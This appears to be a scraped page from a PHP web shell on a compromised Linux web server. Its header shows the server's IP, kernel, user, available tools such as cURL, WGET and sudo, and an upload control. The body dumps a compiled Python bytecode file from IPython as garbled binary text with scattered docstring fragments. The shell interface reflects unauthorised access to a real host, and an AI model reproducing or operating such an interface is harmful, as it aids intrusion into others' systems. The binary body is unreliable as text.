| Server IP : 35.80.110.71 / Your IP : 216.73.216.221 Web Server : Apache/2.4.58 (Ubuntu) System : Linux ip-172-31-21-44 6.17.0-1019-aws #19~24.04.1-Ubuntu SMP Tue Jun 23 18:53:06 UTC 2026 x86_64 User : ubuntu ( 1000) PHP Version : 8.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /lib/python3/dist-packages/IPython/utils/__pycache__/ |
Upload File : |
�
}�e� � �, � d Z ddlmZ ede� d� Zy)zN
Utilities for version comparison
It is a bit ridiculous that we need these.
� )�warnzIThe `IPython.utils.version` module has been deprecated since IPython 8.0.c �t � t dt d�� ddlm} || � ||� k\ S # t $ r Y yw xY w)z�check version string v >= check
If dev/prerelease tags result in TypeError for string-number comparison,
it is assumed that the dependency is satisfied.
Users on dev branches are responsible for keeping their own packages up to date.
z_`check_version` function is deprecated as of IPython 8.0and will be removed in future versions.� )�
stacklevelr )�LooseVersionT)r �DeprecationWarning�distutils.versionr � TypeError)�v�checkr s �7/usr/lib/python3/dist-packages/IPython/utils/version.py�
check_versionr sG � � � 2��� � /���A��,�u�"5�5�5��� ���s �+ � 7�7N)�__doc__�warningsr r r � � r
�<module>r s"